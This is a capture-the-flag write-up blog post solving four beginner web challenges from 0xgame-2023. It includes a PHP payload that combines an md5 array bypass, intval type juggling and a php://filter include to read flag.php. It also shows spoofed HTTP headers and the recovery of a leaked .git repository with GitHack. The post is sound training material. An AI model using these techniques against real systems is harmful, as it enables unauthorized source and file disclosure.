0xgame-2023

web

[Week 1] signin

信息收集,查看源码发现assets/index-33309f51.js,打开后在页面最底部可发现一个sourceMappingURL=index-33309f51.js.map,猜测可能是sourcemap文件泄露

/assets/index-33309f51.js.map下载文件,找到flag

[Week 1] baby_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
// flag in flag.php
highlight_file(__FILE__);

if (isset($_GET['a']) && isset($_GET['b']) && isset($_POST['c']) && isset($_COOKIE['name'])) {
$a = $_GET['a'];
$b = $_GET['b'];
$c = $_POST['c'];
$name = $_COOKIE['name'];

if ($a != $b && md5($a) == md5($b)) {
if (!is_numeric($c) && $c != 1024 && intval($c) == 1024) {
include($name.'.php');
}
}
}
?>

payload:

1
http://120.27.148.152:50014/?a[]=1&b[]=2

Post: c=1024.1a

Cookie: name=php://filter/convert.base64-encode/resource=flag

[Week 1] hello_http

get方式传参

1
http://120.27.148.152:50012/?query=ctf

post方式传参

1
action=getflag

更改Cookie

1
Cookie: role=admin

加XFF头

1
X-Forwarded-For: 127.0.0.1

改UA头

1
User-Agent: HarmonyOS Browser

改Referer

1
Referer: ys.mihoyo.com

得到flag

[Week 1] repo_leak

python2 GitHack.py http://120.27.148.152:50013/.git

X8gCH.png

https://blog.csdn.net/COCOLI_BK/article/details/103344407

git log

git reflog

查看历史版本

X8UH5.png

git reset --hard 8a5b670558921bd232d75b29542492f00698298b

切换至有flag的版本

X852U.png

grep -r "flag" ./

当前目录匹配含flag文件


0xgame-2023
http://example.com/2023/10/07/比赛/0xgame-2023/
作者
Englobe
发布于
2023年10月7日
许可协议